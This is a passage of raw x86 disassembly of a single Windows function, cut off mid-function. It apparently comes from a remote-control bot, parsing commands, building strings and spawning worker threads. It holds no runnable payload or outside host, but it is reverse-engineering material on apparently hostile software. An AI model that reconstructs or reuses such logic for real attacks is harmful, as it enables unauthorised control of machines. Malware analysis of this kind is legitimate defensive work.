var_113C = byte ptr -113Ch
var_1130 = byte ptr -1130h
var_10BC = byte ptr -10BCh
var_10B0 = byte ptr -10B0h
var_103C = dword ptr -103Ch
var_1038 = dword ptr -1038h
var_1034 = dword ptr -1034h
var_1030 = dword ptr -1030h
var_102C = dword ptr -102Ch
var_1028 = dword ptr -1028h
var_1024 = dword ptr -1024h
var_1020 = dword ptr -1020h
var_101C = byte ptr -101Ch
var_F18 = dword ptr -0F18h
var_F14 = byte ptr -0F14h
var_E94 = byte ptr -0E94h
var_D95 = byte ptr -0D95h
var_D94 = byte ptr -0D94h
var_C94 = dword ptr -0C94h
var_C90 = dword ptr -0C90h
var_C8C = dword ptr -0C8Ch
var_C88 = dword ptr -0C88h
var_C84 = dword ptr -0C84h
var_C80 = dword ptr -0C80h
var_C7C = dword ptr -0C7Ch
var_C78 = dword ptr -0C78h
var_C74 = dword ptr -0C74h
var_C70 = byte ptr -0C70h
var_BF0 = byte ptr -0BF0h
ProcessInformation= _PROCESS_INFORMATION ptr -0BE4h
var_BD4 = dword ptr -0BD4h
var_BD0 = byte ptr -0BD0h
Buffer = byte ptr -0BC4h
Parameters = byte ptr -0BC0h
var_B50 = byte ptr -0B50h
var_AD0 = dword ptr -0AD0h
var_ACC = dword ptr -0ACCh
var_AC8 = dword ptr -0AC8h
var_AC4 = dword ptr -0AC4h
var_AC0 = byte ptr -0AC0h
var_A5F = byte ptr -0A5Fh
var_A5E = byte ptr -0A5Eh
var_A5C = byte ptr -0A5Ch
var_A5B = byte ptr -0A5Bh
var_A52 = byte ptr -0A52h
var_A50 = byte ptr -0A50h
var_A4E = byte ptr -0A4Eh
var_A4D = byte ptr -0A4Dh
var_9C0 = byte ptr -9C0h
Parameter = dword ptr -974h
var_96C = byte ptr -96Ch
var_960 = dword ptr -960h
var_95C = byte ptr -95Ch
var_958 = byte ptr -958h
var_85C = byte ptr -85Ch
var_854 = byte ptr -854h
var_7DC = dword ptr -7DCh
var_7D4 = dword ptr -7D4h
var_7D0 = dword ptr -7D0h
var_7CC = dword ptr -7CCh
var_7C8 = dword ptr -7C8h
var_7C4 = dword ptr -7C4h
var_7C0 = byte ptr -7C0h
var_758 = dword ptr -758h
var_754 = byte ptr -754h
var_6D4 = dword ptr -6D4h
var_6D0 = dword ptr -6D0h
var_6CC = dword ptr -6CCh
var_6C8 = dword ptr -6C8h
var_6C4 = dword ptr -6C4h
var_6C0 = dword ptr -6C0h
var_6BC = byte ptr -6BCh
var_63C = byte ptr -63Ch
var_5BC = dword ptr -5BCh
var_5B8 = dword ptr -5B8h
var_5B4 = dword ptr -5B4h
var_5B0 = dword ptr -5B0h
var_5AC = dword ptr -5ACh
var_5A8 = dword ptr -5A8h
var_5A4 = dword ptr -5A4h
var_5A0 = dword ptr -5A0h
var_59C = byte ptr -59Ch
var_58C = byte ptr -58Ch
var_50C = byte ptr -50Ch
var_48C = dword ptr -48Ch
var_488 = dword ptr -488h
var_484 = dword ptr -484h
var_480 = dword ptr -480h
var_47C = dword ptr -47Ch
var_470 = dword ptr -470h
var_46C = dword ptr -46Ch
var_464 = dword ptr -464h
var_460 = dword ptr -460h
var_45C = dword ptr -45Ch
var_458 = dword ptr -458h
var_450 = byte ptr -450h
var_434 = dword ptr -434h
var_430 = byte ptr -430h
var_42C = dword ptr -42Ch
var_428 = byte ptr -428h
var_41C = dword ptr -41Ch
var_418 = byte ptr -418h
var_3B0 = byte ptr -3B0h
var_3A8 = dword ptr -3A8h
var_3A4 = dword ptr -3A4h
var_3A0 = dword ptr -3A0h
in = in_addr ptr -39Ch
var_398 = dword ptr -398h
var_394 = dword ptr -394h
var_390 = dword ptr -390h
var_38C = dword ptr -38Ch
var_388 = dword ptr -388h
var_384 = dword ptr -384h
var_380 = dword ptr -380h
var_37C = byte ptr -37Ch
var_350 = dword ptr -350h
StartupInfo = _STARTUPINFOA ptr -330h
var_2EC = dword ptr -2ECh
var_EC = dword ptr -0ECh
var_E8 = dword ptr -0E8h
name = sockaddr ptr -0E4h
var_D4 = byte ptr -0D4h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_A8 = dword ptr -0A8h
var_A4 = byte ptr -0A4h
var_94 = dword ptr -94h
lpExistingFileName= dword ptr -90h
hFile = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_54 = byte ptr -54h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
ThreadId = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
addr = dword ptr 8
s = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
lpNewFileName = word ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
mov eax, 28A8h
call sub_417F30
push ebx
push esi
mov esi, 200h
push edi
xor ebx, ebx
push esi
lea eax, [ebp+var_2EC]
push ebx
push eax
mov [ebp+var_BC], 3
mov [ebp+ThreadId], ebx
mov [ebp+var_B8], ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [ebp+var_E8], ebx
call sub_4179E0
push 1Bh
lea eax, [ebp+var_450]
push dword ptr [ebp+arg_10]
push eax
call sub_419300
add esp, 18h
cmp [ebp+addr], ebx
jz loc_4100FB
push esi
lea eax, [ebp+var_22A8]
push ebx
push eax
call sub_4179E0
dec esi
lea eax, [ebp+var_22A8]
push esi
push [ebp+addr]
push eax
call sub_419300
lea eax, [ebp+var_22A8]
push 43A9B0h
push eax
call sub_417F60
mov [ebp+var_C], eax
lea eax, [ebp+var_22A8]
push esi
push eax
lea eax, [ebp+var_24A8]
push eax
call sub_419300
mov esi, 42AD00h
lea eax, [ebp+var_24A8]
push esi
push eax
call sub_419260
xor edi, edi
add esp, 34h
mov [ebp+var_94], eax
inc edi
loc_40FD69: ; CODE XREF: sub_40FCA3+DA�j
push esi
push ebx
call sub_419260
mov [ebp+edi*4+var_94], eax
inc edi
pop ecx
cmp edi, 20h
pop ecx
jl short loc_40FD69
mov esi, [ebp+var_94]
cmp esi, ebx
jz loc_4100FB
cmp [ebp+lpExistingFileName], ebx
jz loc_4100FB
push 100h
lea eax, [ebp+var_AC0]
push ebx
push eax
call sub_4179E0
add esp, 0Ch
push 1Fh
pop edx
loc_40FDB1: ; CODE XREF: sub_40FCA3+142�j
lea ecx, [ebp+edx*4+var_94]
mov eax, [ecx]
cmp eax, ebx
jz short loc_40FDE4
cmp byte ptr [eax], 2Dh
jnz short loc_40FDE7
cmp [eax+2], bl
jnz short loc_40FDE7
movsx esi, byte ptr [eax+1]
mov [ecx], ebx
mov [ebp+esi+var_AC0], 1
mov esi, [ebp+var_94]
mov [eax], bl
mov [eax+1], bl
mov [eax+2], bl
loc_40FDE4: ; CODE XREF: sub_40FCA3+119�j
dec edx
jns short loc_40FDB1
loc_40FDE7: ; CODE XREF: sub_40FCA3+11E�j
; sub_40FCA3+123�j
xor edi, edi
inc edi
cmp [ebp+var_A4D], bl
jz short loc_40FDF5
mov [ebp+var_8], edi
loc_40FDF5: ; CODE XREF: sub_40FCA3+14D�j
cmp [ebp+var_A52], bl
jz short loc_40FE03
mov [ebp+var_8], ebx
mov [ebp+var_4], edi
loc_40FE03: ; CODE XREF: sub_40FCA3+158�j
cmp byte ptr [esi], 0Ah
jz short loc_40FE3D
push 7Fh
lea eax, [ebp+var_C70]
push esi
push eax
call sub_419300
lea eax, [esi+1]
push 17h
push eax
lea eax, [ebp+var_D4]
push eax
call sub_419300
lea eax, [ebp+var_D4]
push 43A9ACh
push eax
call sub_419260
add esp, 20h
loc_40FE3D: ; CODE XREF: sub_40FCA3+163�j
push esi
push 43A9A4h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_40FE8E
push [ebp+lpExistingFileName] ; char
mov byte ptr [esi+1], 4Fh
push 43A998h ; int
push [ebp+s] ; s
call sub_40E190
mov eax, [ebp+arg_20]
add esp, 0Ch
cmp [eax], ebx
jnz loc_40FF35
push [ebp+arg_C]
push dword ptr [ebp+arg_8] ; char
push 43A988h ; int
push [ebp+s] ; s
call sub_40E190
add esp, 10h
jmp loc_40FF35
; ---------------------------------------------------------------------------
loc_40FE8E: ; CODE XREF: sub_40FCA3+1A9�j
mov esi, [ebp+lpExistingFileName]
push esi
push 43A984h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4160A9
push esi
push 43A980h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4160A9
push esi
push 43A97Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_40FEF9
push 43A978h
push [ebp+var_88]
call sub_417F60
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40FF35
inc eax
push 9Fh
push eax
push [ebp+arg_1C]
call sub_419300
add esp, 0Ch
jmp short loc_40FF35
; ---------------------------------------------------------------------------
loc_40FEF9: ; CODE XREF: sub_40FCA3+22A�j
push esi
push 43A974h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_40FF3C
push ebx
push dword ptr unk_4315C4
push dword ptr unk_4315C0
push dword ptr [ebp+arg_10]
push [ebp+s]
call sub_41689B
push dword ptr [ebp+arg_10] ; char
push 43A968h ; int
push [ebp+s] ; s
call sub_40E190
add esp, 20h
loc_40FF35: ; CODE XREF: sub_40FCA3+1CA�j
; sub_40FCA3+1E6�j ...
mov eax, edi
jmp loc_4100FE
; ---------------------------------------------------------------------------
loc_40FF3C: ; CODE XREF: sub_40FCA3+265�j
mov esi, dword ptr [ebp+lpNewFileName]
mov [ebp+var_EC], 2
mov edi, 80h
loc_40FF4E: ; CODE XREF: sub_40FCA3+2D0�j
lea eax, [ebp+var_C70]
push eax
push esi
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_40FF6B
mov [ebp+var_B8], 1
loc_40FF6B: ; CODE XREF: sub_40FCA3+2BC�j
add esi, edi
dec [ebp+var_EC]
jnz short loc_40FF4E
mov esi, [ebp+lpExistingFileName]
push esi
push 43A960h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_410054
mov esi, dword ptr [ebp+lpNewFileName]
mov [ebp+arg_24], 2
loc_40FF9A: ; CODE XREF: sub_40FCA3+376�j
cmp [esi], bl
jz short loc_410014
push 7Fh
lea eax, [ebp+var_C70]
push esi
push eax
call sub_419300
add esp, 0Ch
cmp [ebp+var_88], ebx
jz short loc_410014
push [ebp+var_88]
lea eax, [ebp+var_D4]
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_410014
lea eax, [ebp+var_D4]
mov [esi], bl
push eax
lea eax, [ebp+var_2EC]
push 43A930h
push eax
call sub_41795B
lea eax, [ebp+var_2EC]
push eax
lea eax, [ebp+var_D4]
push eax ; char
push 43A920h ; int
push [ebp+s] ; s
call sub_40E190
lea eax, [ebp+var_2EC]
push eax
call sub_40CB08
add esp, 20h
loc_410014: ; CODE XREF: sub_40FCA3+2F9�j
; sub_40FCA3+313�j ...
add esi, edi
dec [ebp+arg_24]
jnz loc_40FF9A
push [ebp+var_88]
push dword ptr [ebp+arg_10]
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_4100FB
push [ebp+arg_C]
mov eax, [ebp+arg_20]
push dword ptr [ebp+arg_8] ; char
mov [eax], ebx
push 43A988h ; int
loc_410047: ; CODE XREF: sub_40FCA3+5D9�j
; sub_40FCA3+91E�j
push [ebp+s] ; s
call sub_40E190
jmp loc_415855
; ---------------------------------------------------------------------------
loc_410054: ; CODE XREF: sub_40FCA3+2E7�j
push esi
push 43A918h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_410190
mov eax, [ebp+hFile]
mov esi, dword ptr [ebp+lpNewFileName]
inc eax
mov [ebp+addr], 2
mov [ebp+arg_24], eax
loc_41007D: ; CODE XREF: sub_40FCA3+42C�j
lea eax, [ebp+var_C70]
push eax
push esi
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_4100CA
lea eax, [ebp+var_C70]
push 21h
push eax
call sub_419690
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_1C], eax
jz short loc_4100CA
push [ebp+arg_24]
lea edi, [esi+2]
mov byte ptr [esi], 3Ah
lea eax, [edi-1]
push eax
call sub_417FE0
push [ebp+arg_1C]
push edi
call sub_417FF0
add esp, 10h
mov edi, 80h
loc_4100CA: ; CODE XREF: sub_40FCA3+3EB�j
; sub_40FCA3+402�j
add esi, edi
dec [ebp+addr]
jnz short loc_41007D
cmp [ebp+arg_24], ebx
jz short loc_4100FB
push dword ptr [ebp+arg_10]
lea eax, [ebp+var_D4]
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_410103
push 0Fh
push [ebp+arg_24]
push dword ptr [ebp+arg_10]
call sub_419300
add esp, 0Ch
loc_4100FB: ; CODE XREF: sub_40FCA3+5B�j
; sub_40FCA3+E4�j ...
xor eax, eax
inc eax
loc_4100FE: ; CODE XREF: sub_40FCA3+294�j
; sub_40FCA3+2AB1�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_410103: ; CODE XREF: sub_40FCA3+446�j
mov edi, dword ptr [ebp+lpNewFileName]
xor esi, esi
loc_410108: ; CODE XREF: sub_40FCA3+486�j
cmp [edi], bl
jz short loc_41011F
lea eax, [ebp+var_C70]
push eax
push edi
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz short loc_41012D
loc_41011F: ; CODE XREF: sub_40FCA3+467�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_410108
jmp short loc_4100FB
; ---------------------------------------------------------------------------
loc_41012D: ; CODE XREF: sub_40FCA3+47A�j
lea eax, [ebp+var_C70]
push 21h
push eax
call sub_419690
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+addr], eax
jz short loc_4100FB
push eax
call sub_4180D0
push [ebp+arg_24]
mov edi, eax
call sub_4180D0
add edi, eax
pop ecx
cmp edi, 7Eh
pop ecx
ja short loc_4100FB
push [ebp+addr]
shl esi, 7
push [ebp+arg_24]
add esi, dword ptr [ebp+lpNewFileName]
push 43A910h
push esi
call sub_41795B
push ebx ; int
lea eax, [ebp+var_350]
push ebx ; int
push eax ; int
push dword ptr [ebp+arg_8] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 24h
jmp loc_4100FB
; ---------------------------------------------------------------------------
loc_410190: ; CODE XREF: sub_40FCA3+3C0�j
push esi
push 43A908h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz short loc_4101B2
push esi
push 42AA24h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_4101D9
loc_4101B2: ; CODE XREF: sub_40FCA3+4FC�j
mov edi, dword ptr [ebp+lpNewFileName]
xor esi, esi
loc_4101B7: ; CODE XREF: sub_40FCA3+534�j
cmp [edi], bl
jz short loc_4101CD
push [ebp+var_94]
push edi
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz short loc_410220
loc_4101CD: ; CODE XREF: sub_40FCA3+516�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_4101B7
loc_4101D9: ; CODE XREF: sub_40FCA3+50D�j
push [ebp+lpExistingFileName]
push 43A904h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_410281
push [ebp+var_84]
push dword ptr [ebp+arg_8]
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_410210
mov eax, [ebp+arg_20]
mov dword ptr [eax], 1
loc_410210: ; CODE XREF: sub_40FCA3+562�j
push [ebp+var_84]
push 43A8D4h
jmp loc_41609D
; ---------------------------------------------------------------------------
loc_410220: ; CODE XREF: sub_40FCA3+528�j
mov eax, dword ptr [ebp+lpNewFileName]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_D4]
push eax
lea eax, [ebp+var_2EC]
push 43A8A4h
push eax
call sub_41795B
lea eax, [ebp+var_2EC]
push eax
call sub_40CB08
push [ebp+lpExistingFileName]
push 43A908h
call sub_417D80
add esp, 18h
test eax, eax
jnz loc_4100FB
lea eax, [ebp+var_2EC]
push eax
mov eax, [ebp+var_94]
inc eax
push eax
push 43A920h
jmp loc_410047
; ---------------------------------------------------------------------------
loc_410281: ; CODE XREF: sub_40FCA3+54A�j
push [ebp+lpExistingFileName]
mov esi, 430744h
push esi
call sub_417D80
pop ecx
mov edi, 43074Ch
test eax, eax
pop ecx
jz short loc_4102D5
push [ebp+lpExistingFileName]
push edi
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz short loc_4102D5
push [ebp+lpExistingFileName]
push 43A8A0h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_415F22
cmp dword ptr unk_4315B0, ebx
jz loc_415F22
loc_4102D5: ; CODE XREF: sub_40FCA3+5F8�j
; sub_40FCA3+60A�j
push [ebp+lpExistingFileName]
push esi
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_41044E
push [ebp+lpExistingFileName]
push edi
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_41044E
mov eax, [ebp+var_88]
inc [ebp+var_84]
mov [ebp+var_BC], 4
mov [ebp+hFile], eax
loc_41031D: ; CODE XREF: sub_40FCA3+86A�j
; sub_40FCA3+8F3�j ...
mov eax, [ebp+var_BC]
mov esi, eax
shl esi, 2
lea edi, [ebp+esi+var_94]
mov eax, [edi]
push eax
push 43A898h
mov dword ptr [ebp+arg_8], eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_41073A
push [ebp+esi+lpExistingFileName]
push 43A890h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_410602
cmp [ebp+var_B8], ebx
jz loc_4105D8
push [ebp+esi+hFile]
mov edi, 42744Ch
lea eax, [ebp+var_958]
push edi
push eax
call sub_41795B
push [ebp+esi+var_88]
lea eax, [ebp+var_96C]
push edi
push eax
call sub_41795B
push [ebp+esi+var_84]
call sub_417ECF
mov [ebp+var_7D4], eax
mov eax, [ebp+s]
mov [ebp+Parameter], eax
lea eax, [ebp+var_D4]
push 7Fh
push eax
lea eax, [ebp+var_854]
push eax
call sub_419300
mov eax, [ebp+var_4]
mov [ebp+var_7CC], eax
mov eax, [ebp+var_8]
mov [ebp+var_7C8], eax
lea eax, [ebp+var_854]
push eax
lea eax, [ebp+var_958]
push eax
lea eax, [ebp+var_2EC]
push 43A854h
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_2EC]
push 14h
push eax
call sub_41741F
add esp, 44h
mov [ebp+var_7D0], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+Parameter]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_40D432 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_7D0]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jz loc_4149FD
jmp loc_4105CE
; ---------------------------------------------------------------------------
loc_41044E: ; CODE XREF: sub_40FCA3+642�j
; sub_40FCA3+658�j
push [ebp+lpExistingFileName]
push edi
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_410467
mov [ebp+var_4], 1
loc_410467: ; CODE XREF: sub_40FCA3+7BB�j
cmp [ebp+hFile], ebx
jz loc_4100FB
push 429510h
push [ebp+hFile]
call sub_417F60
pop ecx
test eax, eax
pop ecx
jz short loc_41048E
cmp [ebp+var_4], ebx
jz short loc_41049A
loc_41048E: ; CODE XREF: sub_40FCA3+7E4�j
lea eax, [ebp+var_D4]
mov [ebp+hFile], eax
loc_41049A: ; CODE XREF: sub_40FCA3+7E9�j
cmp [ebp+var_88], ebx
jz loc_4100FB
inc [ebp+var_88]
jz short loc_4104E4
cmp dword ptr [ebp+arg_10], ebx
jz short loc_4104E4
lea eax, [ebp+var_450]
push eax
call sub_4180D0
push eax
lea eax, [ebp+var_450]
push [ebp+var_88]
push eax
call sub_419400
add esp, 10h
neg eax
sbb eax, eax
add eax, 4
mov [ebp+var_BC], eax
jmp short loc_4104EA
; ---------------------------------------------------------------------------
loc_4104E4: ; CODE XREF: sub_40FCA3+809�j
; sub_40FCA3+80E�j
mov eax, [ebp+var_BC]
loc_4104EA: ; CODE XREF: sub_40FCA3+83F�j
mov esi, eax
shl esi, 2
mov edi, [ebp+esi+var_94]
cmp edi, ebx
jz loc_4100FB
push edi
push 43A848h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_41031D
mov ecx, [ebp+hFile]
cmp byte ptr [ecx], 23h
jz short loc_410587
mov eax, dword ptr byte_445EDC+0D41B8h
mov eax, dword ptr unk_4316CC[eax*4]
cmp [eax], bl
jz short loc_410587
push eax
push ecx ; char
push 43A82Ch ; int
push [ebp+s] ; s
call sub_40E190
lea eax, [ebp+var_D4]
push eax
lea eax, [ebp+var_2EC]
push 43A810h
push eax
call sub_41795B
lea eax, [ebp+var_2EC]
push eax
call sub_40CB08
add esp, 20h
cmp [ebp+var_B8], ebx
jnz loc_4100FB
push ebx
lea eax, [ebp+var_2EC]
push 1
push eax
push 519FA4h
push [ebp+s]
jmp loc_4156B8
; ---------------------------------------------------------------------------
loc_410587: ; CODE XREF: sub_40FCA3+879�j
; sub_40FCA3+889�j
push edi
push 43A808h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_41031D
mov esi, [ebp+esi+lpExistingFileName]
cmp esi, ebx
jz loc_41031D
mov eax, [ebp+hFile]
cmp byte ptr [eax], 23h
jz loc_41031D
push esi
push eax
push 43A7F0h
jmp loc_410047
; ---------------------------------------------------------------------------
loc_4105C6: ; CODE XREF: sub_40FCA3+931�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_4105CE: ; CODE XREF: sub_40FCA3+7A6�j
cmp [ebp+var_7C4], ebx
jz short loc_4105C6
jmp short loc_4105FA
; ---------------------------------------------------------------------------
loc_4105D8: ; CODE XREF: sub_40FCA3+6C7�j
lea eax, [ebp+var_D4]
push eax
lea eax, [ebp+var_2EC]
push [ebp+esi+hFile]
push 43A7A0h
push eax
call sub_41795B
add esp, 10h
loc_4105FA: ; CODE XREF: sub_40FCA3+933�j
; sub_40FCA3+A70�j ...
xor esi, esi
inc esi
jmp loc_412745
; ---------------------------------------------------------------------------
loc_410602: ; CODE XREF: sub_40FCA3+6BB�j
push [ebp+esi+lpExistingFileName]
push 43A794h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_410750
cmp [ebp+var_B8], ebx
jz loc_410729
push 15h
call sub_417661
test eax, eax
pop ecx
jnz loc_410718
push [ebp+esi+var_88]
lea eax, [ebp+var_96C]
push 42744Ch
push eax
call sub_41795B
push [ebp+esi+var_84]
call sub_417ECF
mov [ebp+var_7D4], eax
mov eax, [ebp+s]
mov [ebp+Parameter], eax
lea eax, [ebp+var_D4]
push 7Fh
push eax
lea eax, [ebp+var_854]
push eax
call sub_419300
mov eax, [ebp+var_4]
mov [ebp+var_7CC], eax
mov eax, [ebp+var_8]
mov [ebp+var_7C8], eax
lea eax, [ebp+var_D4]
push eax
lea eax, [ebp+var_2EC]
push 43A764h
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_2EC]
push 15h
push eax
call sub_41741F
add esp, 34h
mov [ebp+var_7D0], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+Parameter]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_40CECF ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_7D0]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_41070B
call GetLastError
push eax
push 43A720h
jmp loc_413B05
; ---------------------------------------------------------------------------
loc_410703: ; CODE XREF: sub_40FCA3+A6E�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_41070B: ; CODE XREF: sub_40FCA3+A4D�j
cmp [ebp+var_7C4], ebx
jz short loc_410703
jmp loc_4105FA
; ---------------------------------------------------------------------------
loc_410718: ; CODE XREF: sub_40FCA3+990�j
lea eax, [ebp+var_D4]
push eax
push 43A6E0h
jmp loc_413B05
; ---------------------------------------------------------------------------
loc_410729: ; CODE XREF: sub_40FCA3+980�j
lea eax, [ebp+var_D4]
push eax
push 43A6A0h
jmp loc_413B05
; ---------------------------------------------------------------------------
loc_41073A: ; CODE XREF: sub_40FCA3+6A0�j
mov eax, dword ptr [ebp+arg_8]
lea ecx, [eax+1]
mov al, [eax]
cmp al, byte ptr unk_4315B8
mov [edi], ecx
jnz loc_4100FB
loc_410750: ; CODE XREF: sub_40FCA3+974�j
mov edi, [edi]
push edi
push 43A694h
mov dword ptr [ebp+arg_8], edi
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415F2A
push edi
push 43A68Ch
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_415F2A
cmp [ebp+var_B8], ebx
jnz short loc_4107A1
push [ebp+lpExistingFileName]
push 43A8A0h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_415F22
loc_4107A1: ; CODE XREF: sub_40FCA3+AE2�j
cmp [ebp+arg_28], ebx
jnz loc_415F22
xor edi, edi
cmp dword ptr unk_4333B8, ebx
jle loc_410945
mov [ebp+arg_20], 44AAE8h
loc_4107BF: ; CODE XREF: sub_40FCA3+B3B�j
push dword ptr [ebp+arg_8]
push [ebp+arg_20]
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz short loc_4107E5
add [ebp+arg_20], 0B8h
inc edi
cmp edi, dword ptr unk_4333B8
jl short loc_4107BF
jmp loc_410945
; ---------------------------------------------------------------------------
loc_4107E5: ; CODE XREF: sub_40FCA3+B2B�j
push 43A9B0h
push [ebp+addr]
call sub_417F60
pop ecx
cmp eax, ebx
pop ecx
jz loc_4100FB
mov cl, byte ptr unk_4315B8
imul edi, 0B8h
mov [eax+2], cl
mov cl, byte ptr unk_4315B8
mov [eax+3], cl
lea ecx, [edi+44AB00h]
push 9Fh
add eax, 4
push ecx
push eax
call sub_419300
lea eax, [edi+44AAE8h]
add esp, 0Ch
mov [ebp+arg_20], 0Fh
mov [ebp+arg_C], eax
lea edi, [ebp+esi+var_54]
loc_410840: ; CODE XREF: sub_40FCA3+C37�j
push [ebp+arg_20]
lea eax, [ebp+var_B4]
push 43A684h
push eax
call sub_41795B
lea eax, [ebp+var_B4]
push eax
push [ebp+addr]
call sub_417F60
add esp, 14h
test eax, eax
jz short loc_4108A2
cmp [edi], ebx
jz short loc_4108A6
push [ebp+arg_C]
call sub_4180D0
add [ebp+var_C], eax
pop ecx
jz short loc_4108D1
push dword ptr [edi-4]
push [ebp+var_C]
call sub_417F60
pop ecx
cmp eax, ebx
pop ecx
jz short loc_4108D1
push eax
lea eax, [ebp+var_B4]
push eax
push [ebp+addr]
call sub_40B124
add esp, 0Ch
jmp short loc_4108D1
; ---------------------------------------------------------------------------
loc_4108A2: ; CODE XREF: sub_40FCA3+BC5�j
cmp [edi], ebx
jnz short loc_4108D1
loc_4108A6: ; CODE XREF: sub_40FCA3+BC9�j
lea eax, [ebp+var_B4]
push 2
push eax
lea eax, [ebp+var_14]
push eax
call sub_419300
lea eax, [ebp+var_14]
mov [ebp+var_12], bl
push eax
lea eax, [ebp+var_B4]
push eax
push [ebp+addr]
call sub_40B124
add esp, 18h
loc_4108D1: ; CODE XREF: sub_40FCA3+BD7�j
; sub_40FCA3+BE8�j ...
dec [ebp+arg_20]
sub edi, 4
cmp [ebp+arg_20], ebx
jg loc_410840
lea eax, [ebp+esi+var_54]
mov [ebp+arg_20], 10h
mov edi, eax
loc_4108ED: ; CODE XREF: sub_40FCA3+C96�j
push [ebp+arg_20]
lea eax, [ebp+var_B4]
push 43A680h
push eax
call sub_41795B
lea eax, [ebp+var_B4]
push eax
push [ebp+addr]
call sub_417F60
add esp, 14h
test eax, eax
jz short loc_410930
mov eax, [edi]
cmp eax, ebx
jz short loc_410930
push eax
lea eax, [ebp+var_B4]
push eax
push [ebp+addr]
call sub_40B124
add esp, 0Ch
loc_410930: ; CODE XREF: sub_40FCA3+C72�j
; sub_40FCA3+C78�j
dec [ebp+arg_20]
sub edi, 4
cmp [ebp+arg_20], ebx
jg short loc_4108ED
mov [ebp+var_E8], 1
loc_410945: ; CODE XREF: sub_40FCA3+B0F�j
; sub_40FCA3+B3D�j
mov eax, dword ptr [ebp+arg_8]
mov edi, [ebp+s]
mov al, [eax]
cmp al, byte ptr unk_4315B8
jz short loc_410961
cmp [ebp+var_E8], ebx
jz loc_410B56
loc_410961: ; CODE XREF: sub_40FCA3+CB0�j
push dword ptr [ebp+arg_10]
push 43A67Ch
push [ebp+addr]
call sub_40B124
lea eax, [ebp+var_D4]
push eax
push 43A674h
push [ebp+addr]
call sub_40B124
push [ebp+hFile]
push 43A66Ch
push [ebp+addr]
call sub_40B124
push ebx
push ebx
lea eax, [ebp+var_B4]
push 1
push eax
push edi
call sub_41689B
push eax
push 43A660h
push [ebp+addr]
call sub_40B124
add esp, 44h
push [ebp+arg_14]
push 43A658h
push [ebp+addr]
call sub_40B124
push 43A650h
push [ebp+addr]
call sub_417F60
add esp, 14h
jmp loc_410ACB
; ---------------------------------------------------------------------------
loc_4109DF: ; CODE XREF: sub_40FCA3+E2A�j
push 43A650h
push [ebp+addr]
call sub_417F60
mov dword ptr [ebp+arg_10], eax
add eax, 5
push 4
push eax
lea eax, [ebp+var_B4]
